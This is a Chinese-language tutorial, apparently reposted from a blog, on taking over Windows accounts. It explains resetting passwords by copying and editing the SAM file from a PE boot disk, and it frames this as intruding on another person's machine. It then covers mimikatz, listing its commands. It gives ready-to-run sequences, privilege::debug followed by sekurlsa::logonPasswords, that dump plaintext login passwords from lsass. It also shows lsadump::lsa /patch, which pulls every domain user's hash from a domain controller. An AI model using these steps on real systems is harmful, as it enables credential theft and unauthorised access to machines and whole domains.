admin 管理员组文章数量: 887018
目录
- 基于SAM文件的密码破解
- Mimikatz是个啥?
- mimikatz基础命令
- 抓取windows密码
- 使用mimikatz读取域控上所有域用户的hash值
基于SAM文件的密码破解
SAM文件即账号密码数据库文件。 当我们登录系统的时候,系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对,如发现此次密码与SAM文件中的加密数据符合时,你就会顺利登录;如果错误则无法登录。在系统运行期间,SAM文件一直是被占用的,是无法打开和编辑复制的,我们可以进入PE系统进行复制然后在利用软件进行密码的修改
U盘启动,运行DiskGenius分区工具
找到 SAM 文件,复制到U盘
在另一台电脑上下载软件 NTPWedit 并运行,打开 SAM 文件,解锁并修改密码,然后把 SAM 文件复制到原来的电脑上,覆盖原文件。或者我们可以直接利用工具(一般的启动盘PE中都有密码重置功能)一键重置。但是这样就完美的暴露了我们入侵了对方的主机
注意:这样只能修改密码,并不能知道密码的明文
Mimikatz是个啥?
mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
注意:mimikatz的使用需要administrator权限,否则会提权失败。
mimikatz基础命令
• cls | 清屏 |
---|---|
• exit | 退出 |
• version | 查看mimikatz的版本 |
• system::user | 查看当前登录的系统用户 |
• system::computer | 查看计算机名称 |
• process::list | 列出进程 |
• process::suspend 进程名称 | 暂停进程 |
• process::stop 进程名称 | 结束进程 |
• process::modules | 列出系统的核心模块及所在位置 |
• service::list | 列出系统的服务 |
• service::remove | 移除系统的服务 |
• service::start stop 服务名称 | 启动或停止服务 |
• privilege::list | 列出权限列表 |
• privilege::enable | 激活一个或多个权限 |
• privilege::debug | 提升权限 |
• nogpo::cmd | 打开系统的cmd.exe |
• nogpo::regedit | 打开系统的注册表 |
• nogpo::taskmgr | 打开任务管理器 |
• ts::sessions | 显示当前的会话 |
• ts::processes | 显示进程和对应的pid情况等 |
• sekurlsa::wdigest | 获取本地用户信息及密码 |
• sekurlsa::tspkg | 获取tspkg用户信息及密码 |
• sekurlsa::logonPasswords | 获登陆用户信息及密码 |
抓取windows密码
操作很简单,两步搞定
首先需要提权:privilege::debug
然后抓取明文密码:sekurlsa::logonPasswords
使用mimikatz读取域控上所有域用户的hash值
第一步依然是提升权限:privilege::debug
第二步抓取密码:lsadump::lsa /patch
版权声明:本文标题:使用mimikatz抓取windows管理员密码 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1726983329h1052501.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论